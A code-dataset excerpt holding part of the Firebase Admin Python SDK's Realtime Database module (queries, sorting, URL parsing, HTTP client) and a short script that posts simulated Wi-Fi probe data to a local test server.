ValueError: If the child path is not a string, not well-formed or None.
"""
if path in _RESERVED_FILTERS:
raise ValueError('Illegal child path: {0}'.format(path))
return Query(order_by=path, client=self._client, pathurl=self._add_suffix())
def order_by_key(self):
"""Creates a Query that orderes data by key.
Returned Query can be used to set additional parameters, and execute complex database
queries (e.g. limit queries, range queries).
Returns:
Query: A database Query instance.
"""
return Query(order_by='$key', client=self._client, pathurl=self._add_suffix())
def order_by_value(self):
"""Creates a Query that orderes data by value.
Returned Query can be used to set additional parameters, and execute complex database
queries (e.g. limit queries, range queries).
Returns:
Query: A database Query instance.
"""
return Query(order_by='$value', client=self._client, pathurl=self._add_suffix())
def _add_suffix(self, suffix='.json'):
return self._pathurl + suffix
def _listen_with_session(self, callback, session):
url = self._client.base_url + self._add_suffix()
try:
sse = _sseclient.SSEClient(url, session)
return ListenerRegistration(callback, sse)
except requests.exceptions.RequestException as error:
raise _Client.handle_rtdb_error(error)
class Query(object):
"""Represents a complex query that can be executed on a Reference.
Complex queries can consist of up to 2 components: a required ordering constraint, and an
optional filtering constraint. At the server, data is first sorted according to the given
ordering constraint (e.g. order by child). Then the filtering constraint (e.g. limit, range)
is applied on the sorted data to produce the final result. Despite the ordering constraint,
the final result is returned by the server as an unordered collection. Therefore the Query
interface performs another round of sorting at the client-side before returning the results
to the caller. This client-side sorted results are returned to the user as a Python
OrderedDict.
"""
def __init__(self, **kwargs):
order_by = kwargs.pop('order_by')
if not order_by or not isinstance(order_by, six.string_types):
raise ValueError('order_by field must be a non-empty string')
if order_by not in _RESERVED_FILTERS:
if order_by.startswith('/'):
raise ValueError('Invalid path argument: "{0}". Child path must not start '
'with "/"'.format(order_by))
segments = _parse_path(order_by)
order_by = '/'.join(segments)
self._client = kwargs.pop('client')
self._pathurl = kwargs.pop('pathurl')
self._order_by = order_by
self._params = {'orderBy' : json.dumps(order_by)}
if kwargs:
raise ValueError('Unexpected keyword arguments: {0}'.format(kwargs))
def limit_to_first(self, limit):
"""Creates a query with limit, and anchors it to the start of the window.
Args:
limit: The maximum number of child nodes to return.
Returns:
Query: The updated Query instance.
Raises:
ValueError: If the value is not an integer, or set_limit_last() was called previously.
"""
if not isinstance(limit, int) or limit < 0:
raise ValueError('Limit must be a non-negative integer.')
if 'limitToLast' in self._params:
raise ValueError('Cannot set both first and last limits.')
self._params['limitToFirst'] = limit
return self
def limit_to_last(self, limit):
"""Creates a query with limit, and anchors it to the end of the window.
Args:
limit: The maximum number of child nodes to return.
Returns:
Query: The updated Query instance.
Raises:
ValueError: If the value is not an integer, or set_limit_first() was called previously.
"""
if not isinstance(limit, int) or limit < 0:
raise ValueError('Limit must be a non-negative integer.')
if 'limitToFirst' in self._params:
raise ValueError('Cannot set both first and last limits.')
self._params['limitToLast'] = limit
return self
def start_at(self, start):
"""Sets the lower bound for a range query.
The Query will only return child nodes with a value greater than or equal to the specified
value.
Args:
start: JSON-serializable value to start at, inclusive.
Returns:
Query: The updated Query instance.
Raises:
ValueError: If the value is ``None``.
"""
if start is None:
raise ValueError('Start value must not be None.')
self._params['startAt'] = json.dumps(start)
return self
def end_at(self, end):
"""Sets the upper bound for a range query.
The Query will only return child nodes with a value less than or equal to the specified
value.
Args:
end: JSON-serializable value to end at, inclusive.
Returns:
Query: The updated Query instance.
Raises:
ValueError: If the value is ``None``.
"""
if end is None:
raise ValueError('End value must not be None.')
self._params['endAt'] = json.dumps(end)
return self
def equal_to(self, value):
"""Sets an equals constraint on the Query.
The Query will only return child nodes whose value is equal to the specified value.
Args:
value: JSON-serializable value to query for.
Returns:
Query: The updated Query instance.
Raises:
ValueError: If the value is ``None``.
"""
if value is None:
raise ValueError('Equal to value must not be None.')
self._params['equalTo'] = json.dumps(value)
return self
@property
def _querystr(self):
params = []
for key in sorted(self._params):
params.append('{0}={1}'.format(key, self._params[key]))
return '&'.join(params)
def get(self):
"""Executes this Query and returns the results.
The results will be returned as a sorted list or an OrderedDict.
Returns:
object: Decoded JSON result of the Query.
Raises:
FirebaseError: If an error occurs while communicating with the remote database server.
"""
result = self._client.body('get', self._pathurl, params=self._querystr)
if isinstance(result, (dict, list)) and self._order_by != '$priority':
return _Sorter(result, self._order_by).get()
return result
class TransactionAbortedError(exceptions.AbortedError):
"""A transaction was aborted aftr exceeding the maximum number of retries."""
def __init__(self, message):
exceptions.AbortedError.__init__(self, message)
class _Sorter(object):
"""Helper class for sorting query results."""
def __init__(self, results, order_by):
if isinstance(results, dict):
self.dict_input = True
entries = [_SortEntry(k, v, order_by) for k, v in results.items()]
elif isinstance(results, list):
self.dict_input = False
entries = [_SortEntry(k, v, order_by) for k, v in enumerate(results)]
else:
raise ValueError('Sorting not supported for "{0}" object.'.format(type(results)))
self.sort_entries = sorted(entries)
def get(self):
if self.dict_input:
return collections.OrderedDict([(e.key, e.value) for e in self.sort_entries])
else:
return [e.value for e in self.sort_entries]
class _SortEntry(object):
"""A wrapper that is capable of sorting items in a dictionary."""
_type_none = 0
_type_bool_false = 1
_type_bool_true = 2
_type_numeric = 3
_type_string = 4
_type_object = 5
def __init__(self, key, value, order_by):
self._key = key
self._value = value
if order_by == '$key' or order_by == '$priority':
self._index = key
elif order_by == '$value':
self._index = value
else:
self._index = _SortEntry._extract_child(value, order_by)
self._index_type = _SortEntry._get_index_type(self._index)
@property
def key(self):
return self._key
@property
def index(self):
return self._index
@property
def index_type(self):
return self._index_type
@property
def value(self):
return self._value
@classmethod
def _get_index_type(cls, index):
"""Assigns an integer code to the type of the index.
The index type determines how differently typed values are sorted. This ordering is based
on https://firebase.google.com/docs/database/rest/retrieve-data#section-rest-ordered-data
"""
if index is None:
return cls._type_none
elif isinstance(index, bool) and not index:
return cls._type_bool_false
elif isinstance(index, bool) and index:
return cls._type_bool_true
elif isinstance(index, (int, float)):
return cls._type_numeric
elif isinstance(index, six.string_types):
return cls._type_string
else:
return cls._type_object
@classmethod
def _extract_child(cls, value, path):
segments = path.split('/')
current = value
for segment in segments:
if isinstance(current, dict):
current = current.get(segment)
else:
return None
return current
def _compare(self, other):
"""Compares two _SortEntry instances.
If the indices have the same numeric or string type, compare them directly. Ties are
broken by comparing the keys. If the indices have the same type, but are neither numeric
nor string, compare the keys. In all other cases compare based on the ordering provided
by index types.
"""
self_key, other_key = self.index_type, other.index_type
if self_key == other_key:
if self_key in (self._type_numeric, self._type_string) and self.index != other.index:
self_key, other_key = self.index, other.index
else:
self_key, other_key = self.key, other.key
if self_key < other_key:
return -1
elif self_key > other_key:
return 1
else:
return 0
def __lt__(self, other):
return self._compare(other) < 0
def __le__(self, other):
return self._compare(other) <= 0
def __gt__(self, other):
return self._compare(other) > 0
def __ge__(self, other):
return self._compare(other) >= 0
def __eq__(self, other):
return self._compare(other) is 0
class _DatabaseService(object):
"""Service that maintains a collection of database clients."""
_DEFAULT_AUTH_OVERRIDE = '_admin_'
def __init__(self, app):
self._credential = app.credential
db_url = app.options.get('databaseURL')
if db_url:
_DatabaseService._parse_db_url(db_url) # Just for validation.
self._db_url = db_url
else:
self._db_url = None
auth_override = _DatabaseService._get_auth_override(app)
if auth_override != self._DEFAULT_AUTH_OVERRIDE and auth_override != {}:
self._auth_override = json.dumps(auth_override, separators=(',', ':'))
else:
self._auth_override = None
self._timeout = app.options.get('httpTimeout')
self._clients = {}
emulator_host = os.environ.get(_EMULATOR_HOST_ENV_VAR)
if emulator_host:
if '//' in emulator_host:
raise ValueError(
'Invalid {0}: "{1}". It must follow format "host:port".'.format(
_EMULATOR_HOST_ENV_VAR, emulator_host))
self._emulator_host = emulator_host
else:
self._emulator_host = None
def get_client(self, db_url=None):
"""Creates a client based on the db_url. Clients may be cached."""
if db_url is None:
db_url = self._db_url
base_url, namespace = _DatabaseService._parse_db_url(db_url, self._emulator_host)
if base_url == 'https://{0}.firebaseio.com'.format(namespace):
# Production base_url. No need to specify namespace in query params.
params = {}
credential = self._credential.get_credential()
else:
# Emulator base_url. Use fake credentials and specify ?ns=foo in query params.
credential = _EmulatorAdminCredentials()
params = {'ns': namespace}
if self._auth_override:
params['auth_variable_override'] = self._auth_override
client_cache_key = (base_url, json.dumps(params, sort_keys=True))
if client_cache_key not in self._clients:
client = _Client(credential, base_url, self._timeout, params)
self._clients[client_cache_key] = client
return self._clients[client_cache_key]
@classmethod
def _parse_db_url(cls, url, emulator_host=None):
"""Parses (base_url, namespace) from a database URL.
The input can be either a production URL (https://foo-bar.firebaseio.com/)
or an Emulator URL (http://localhost:8080/?ns=foo-bar). In case of Emulator
URL, the namespace is extracted from the query param ns. The resulting
base_url never includes query params.
If url is a production URL and emulator_host is specified, the result
base URL will use emulator_host instead. emulator_host is ignored
if url is already an emulator URL.
"""
if not url or not isinstance(url, six.string_types):
raise ValueError(
'Invalid database URL: "{0}". Database URL must be a non-empty '
'URL string.'.format(url))
parsed_url = urllib.parse.urlparse(url)
if parsed_url.netloc.endswith('.firebaseio.com'):
return cls._parse_production_url(parsed_url, emulator_host)
else:
return cls._parse_emulator_url(parsed_url)
@classmethod
def _parse_production_url(cls, parsed_url, emulator_host):
"""Parses production URL like https://foo-bar.firebaseio.com/"""
if parsed_url.scheme != 'https':
raise ValueError(
'Invalid database URL scheme: "{0}". Database URL must be an HTTPS URL.'.format(
parsed_url.scheme))
namespace = parsed_url.netloc.split('.')[0]
if not namespace:
raise ValueError(
'Invalid database URL: "{0}". Database URL must be a valid URL to a '
'Firebase Realtime Database instance.'.format(parsed_url.geturl()))
if emulator_host:
base_url = 'http://{0}'.format(emulator_host)
else:
base_url = 'https://{0}'.format(parsed_url.netloc)
return base_url, namespace
@classmethod
def _parse_emulator_url(cls, parsed_url):
"""Parses emulator URL like http://localhost:8080/?ns=foo-bar"""
query_ns = urllib.parse.parse_qs(parsed_url.query).get('ns')
if parsed_url.scheme != 'http' or (not query_ns or len(query_ns) != 1 or not query_ns[0]):
raise ValueError(
'Invalid database URL: "{0}". Database URL must be a valid URL to a '
'Firebase Realtime Database instance.'.format(parsed_url.geturl()))
namespace = query_ns[0]
base_url = '{0}://{1}'.format(parsed_url.scheme, parsed_url.netloc)
return base_url, namespace
@classmethod
def _get_auth_override(cls, app):
auth_override = app.options.get('databaseAuthVariableOverride', cls._DEFAULT_AUTH_OVERRIDE)
if auth_override == cls._DEFAULT_AUTH_OVERRIDE or auth_override is None:
return auth_override
if not isinstance(auth_override, dict):
raise ValueError('Invalid databaseAuthVariableOverride option: "{0}". Override '
'value must be a dict or None.'.format(auth_override))
else:
return auth_override
def close(self):
for value in self._clients.values():
value.close()
self._clients = {}
class _Client(_http_client.JsonHttpClient):
"""HTTP client used to make REST calls.
_Client maintains an HTTP session, and handles authenticating HTTP requests along with
marshalling and unmarshalling of JSON data.
"""
def __init__(self, credential, base_url, timeout, params=None):
"""Creates a new _Client from the given parameters.
This exists primarily to enable testing. For regular use, obtain _Client instances by
calling the from_app() class method.
Args:
credential: A Google credential that can be used to authenticate requests.
base_url: A URL prefix to be added to all outgoing requests. This is typically the
Firebase Realtime Database URL.
timeout: HTTP request timeout in seconds. If not set connections will never
timeout, which is the default behavior of the underlying requests library.
params: Dict of query parameters to add to all outgoing requests.
"""
_http_client.JsonHttpClient.__init__(
self, credential=credential, base_url=base_url, headers={'User-Agent': _USER_AGENT})
self.credential = credential
self.timeout = timeout
self.params = params if params else {}
def request(self, method, url, **kwargs):
"""Makes an HTTP call using the Python requests library.
Extends the request() method of the parent JsonHttpClient class. Handles default
params like auth overrides, and low-level exceptions.
Args:
method: HTTP method name as a string (e.g. get, post).
url: URL path of the remote endpoint. This will be appended to the server's base URL.
kwargs: An additional set of keyword arguments to be passed into requests API
(e.g. json, params).
Returns:
Response: An HTTP response object.
Raises:
FirebaseError: If an error occurs while making the HTTP call.
"""
query = '&'.join('{0}={1}'.format(key, self.params[key]) for key in self.params)
extra_params = kwargs.get('params')
if extra_params:
if query:
query = extra_params + '&' + query
else:
query = extra_params
kwargs['params'] = query
if self.timeout:
kwargs['timeout'] = self.timeout
try:
return super(_Client, self).request(method, url, **kwargs)
except requests.exceptions.RequestException as error:
raise _Client.handle_rtdb_error(error)
@classmethod
def handle_rtdb_error(cls, error):
"""Converts an error encountered while calling RTDB into a FirebaseError."""
if error.response is None:
return _utils.handle_requests_error(error)
message = cls._extract_error_message(error.response)
return _utils.handle_requests_error(error, message=message)
@classmethod
def _extract_error_message(cls, response):
"""Extracts an error message from an error response.
If the server has sent a JSON response with an 'error' field, which is the typical
behavior of the Realtime Database REST API, parses the response to retrieve the error
message. If the server has sent a non-JSON response, returns the full response
as the error message.
"""
message = None
try:
# RTDB error format: {"error": "text message"}
data = response.json()
if isinstance(data, dict):
message = data.get('error')
except ValueError:
pass
if not message:
message = 'Unexpected response from database: {0}'.format(response.content.decode())
return message
class _EmulatorAdminCredentials(google.auth.credentials.Credentials):
def __init__(self):
google.auth.credentials.Credentials.__init__(self)
self.token = 'owner'
def refresh(self, request):
pass
|
SimulatedSendPackets.py
|
#coding=utf-8
import random
import threading
from time import ctime,sleep
import json
import requests
import time
def random_mac():
macList = []
for i in range(1, 7):
randStr = "".join(random.sample("0123456789abcdef",2))
macList.append(randStr)
randMac = ":".join(macList)
return randMac
def random_rssi():
return str(random.randrange(-100, 0))
def random_range():
return str(round(random.uniform(0, 100), 1))
def random_id():
return str(random.randrange(1, 1000))
probeList = []
# 模拟探针发包
def send_random_json():
headers = {'Content-Type': 'application/json'}
probe = {"id": ''+random_id(), "mmac": random_mac(), "rate": "3", "wssid": "test", "wmac": random_mac(), "time": time.strftime('%a %b %e %H:%M:%S %Y', time.localtime(time.time()))}
mac_DataMul = []
for i in range(random.randrange(1, 5)):
mac_DataMul.append({"mac": random_mac(), "rssi": random_rssi(), "range": random_range()})
probe['data'] = mac_DataMul
probe = json.dumps(probe)
print(probe)
request = requests.post(url='http://localhost:8000/upload.action', headers=headers, data=probe)
print("response code:", request.status_code)
# 模拟多线程发包
def send_rand_json_with_multi_thread():
for i in range(10):
probe = {"id": i, "mmac": random_mac(), "rate": 3, "wssid": "test", "wmac": random_mac()}
probes = json.dumps(probe)
probeList.append(probes)
for i in range(10):
t = threading.Thread(target=send_random_json)
threads.append(t)
for i in range(10):
threads[i].setDaemon(True)
threads[i].start()
if __name__ == '__main__':
threads = []
probeList = []
index=0
for i in range(1000):
send_random_json()
sleep(1)
print("all over %s" %ctime())
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.